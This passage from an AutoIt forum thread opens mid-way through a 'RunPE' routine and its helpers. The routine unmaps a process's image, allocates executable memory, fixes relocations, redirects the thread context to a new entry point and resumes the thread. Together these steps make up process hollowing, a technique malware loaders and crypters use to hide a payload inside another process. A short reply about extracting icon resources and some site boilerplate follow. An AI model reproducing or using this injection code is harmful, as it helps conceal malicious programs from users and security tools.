  DLLSTRUCTSETDATA($TCONTEXT, "EAX", $PZEROPOINT + $IENTRYPOINTNEW)
CASE 2
  DLLSTRUCTSETDATA($TCONTEXT, "RCX", $PZEROPOINT + $IENTRYPOINTNEW)
CASE 3
  ; FIXME - ITANIUM ARCHITECTURE
ENDSWITCH
#REGION 10. SET NEW CONTEXT
; NEW CONTEXT:
$ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "SetThreadContext", _
"HANDLE", $HTHREAD, _
"PTR", DLLSTRUCTGETPTR($TCONTEXT))
IF  @ERROR OR NOT $ACALL[0] THEN
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(10, 0, 0) ; SETTHREADCONTEXT FUNCTION OR CALL TO IT FAILED
ENDIF
#REGION 11. RESUME THREAD
; AND THAT'S IT!. CONTINUE EXECUTION:
$ACALL = DLLCALL("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $HTHREAD)
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR $ACALL[0] = -1 THEN
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(11, 0, 0) ; RESUMETHREAD FUNCTION OR CALL TO IT FAILED
ENDIF
#REGION 12. CLOSE OPEN HANDLES AND RETURN PID
DLLCALL("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $HPROCESS)
DLLCALL("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $HTHREAD)
; ALL WENT WELL. RETURN NEW PID:
RETURN DLLSTRUCTGETDATA($TPROCESS_INFORMATION, "PROCESSID")
ENDFUNC   ;==>_RUNPE

FUNC __RUNPE_FIXRELOC ($PMODULE, $TDATA, $PADDRESSNEW, $PADDRESSOLD, $FIMAGEX64)

LOCAL $IDELTA = $PADDRESSNEW - $PADDRESSOLD ; DISLOCATION VALUE
LOCAL $ISIZE = DLLSTRUCTGETSIZE($TDATA) ; SIZE OF DATA
LOCAL $PDATA = DLLSTRUCTGETPTR($TDATA) ; ADDRES OF THE DATA STRUCTURE
LOCAL $TIMAGE_BASE_RELOCATION, $IRELATIVEMOVE
LOCAL $IVIRTUALADDRESS, $ISIZEOFBLOCK, $INUMBEROFENTRIES
LOCAL $TENRIES, $IDATA, $TADDRESS
LOCAL $IFLAG = 3 + 7 * $FIMAGEX64 ; IMAGE_REL_BASED_HIGHLOW = 3 OR IMAGE_REL_BASED_DIR64 = 10
WHILE $IRELATIVEMOVE < $ISIZE ; FOR ALL DATA AVAILABLE
$TIMAGE_BASE_RELOCATION = DLLSTRUCTCREATE("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $PDATA + $IRELATIVEMOVE)
$IVIRTUALADDRESS = DLLSTRUCTGETDATA($TIMAGE_BASE_RELOCATION, "VIRTUALADDRESS")
$ISIZEOFBLOCK = DLLSTRUCTGETDATA($TIMAGE_BASE_RELOCATION, "SIZEOFBLOCK")
$INUMBEROFENTRIES = ($ISIZEOFBLOCK - 8) / 2
$TENRIES = DLLSTRUCTCREATE("WORD[" & $INUMBEROFENTRIES & "]", DLLSTRUCTGETPTR($TIMAGE_BASE_RELOCATION) + 8)
; GO THROUGH ALL ENTRIES
FOR $I = 1 TO $INUMBEROFENTRIES
  $IDATA = DLLSTRUCTGETDATA($TENRIES, 1, $I)
  IF  BITSHIFT($IDATA, 12) = $IFLAG THEN ; CHECK TYPE
   $TADDRESS = DLLSTRUCTCREATE("PTR", $PMODULE + $IVIRTUALADDRESS + BITAND($IDATA, 0XFFF)) ; THE REST OF $IDATA IS OFFSET
   DLLSTRUCTSETDATA($TADDRESS, 1, DLLSTRUCTGETDATA($TADDRESS, 1) + $IDELTA) ; THIS IS WHAT'S THIS ALL ABOUT
  ENDIF
NEXT
$IRELATIVEMOVE += $ISIZEOFBLOCK
WEND
RETURN 1 ; ALL OK!
ENDFUNC   ;==>__RUNPE_FIXRELOC

FUNC __RUNPE_ALLOCATEEXESPACEATADDRESS ($HPROCESS, $PADDRESS, $ISIZE)

; ALLOCATE
LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "PTR", "VirtualAllocEx", _
"HANDLE", $HPROCESS, _
"PTR", $PADDRESS, _
"DWORD_PTR", $ISIZE, _
"DWORD", 0X1000, _ ; MEM_COMMIT
"DWORD", 64) ; PAGE_EXECUTE_READWRITE
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR NOT $ACALL[0] THEN
; TRY DIFFERENTLY
$ACALL = DLLCALL("KERNEL32.DLL", "PTR", "VirtualAllocEx", _
"HANDLE", $HPROCESS, _
"PTR", $PADDRESS, _
"DWORD_PTR", $ISIZE, _
"DWORD", 0X3000, _ ; MEM_COMMIT|MEM_RESERVE
"DWORD", 64) ; PAGE_EXECUTE_READWRITE
; CHECK FOR ERRORS OR FAILURE
IF @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; UNABLE TO ALLOCATE
ENDIF
RETURN $ACALL[0]
ENDFUNC   ;==>__RUNPE_ALLOCATEEXESPACEATADDRESS

FUNC __RUNPE_ALLOCATEEXESPACE ($HPROCESS, $ISIZE)

; ALLOCATE SPACE
LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "PTR", "VirtualAllocEx", _
"HANDLE", $HPROCESS, _
"PTR", 0, _
"DWORD_PTR", $ISIZE, _
"DWORD", 0X3000, _ ; MEM_COMMIT|MEM_RESERVE
"DWORD", 64) ; PAGE_EXECUTE_READWRITE
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; UNABLE TO ALLOCATE
RETURN $ACALL[0]
ENDFUNC   ;==>__RUNPE_ALLOCATEEXESPACE

FUNC __RUNPE_UNMAPVIEWOFSECTION ($HPROCESS, $PADDRESS)

DLLCALL("NTDLL.DLL", "INT", "NtUnmapViewOfSection", _
"PTR", $HPROCESS, _
"PTR", $PADDRESS)
; CHECK FOR ERRORS ONLY
IF @ERROR THEN RETURN SETERROR(1, 0, 0) ; FAILURE
RETURN 1
ENDFUNC   ;==>__RUNPE_UNMAPVIEWOFSECTION

FUNC __RUNPE_ISWOW64PROCESS ($HPROCESS)

LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "IsWow64Process", _
"HANDLE", $HPROCESS, _
"BOOL*", 0)
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; FAILURE
RETURN $ACALL[2]
ENDFUNC   ;==>__RUNPE_ISWOW64PROCESS

Share this post


Link to post
Share on other sites

I tried, I really tried, but I just can't understand what the hell you are saying.

I'm going to assume you want to extract a files icon resource, specifically the RT_GROUP_ICON resource right?

If that's what you want, all you need is in the example I provided above.

Else it would be better if you just post your message in your vernacular and let us decipher it.


Things that I've done..

Icon Resource Editor: icon resource editor 

AutoIt Piano: a piano

AutoIt Unlocker: unlocks files when you want to delete them

Colorful tooltips: a wrapper for the tool tips UDF

Rouge GoogleBot: a full screen animation

ASciTE text editor: a text editor written in autoit

Warning: Posts by this user are subject to change or may disappear without notice.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0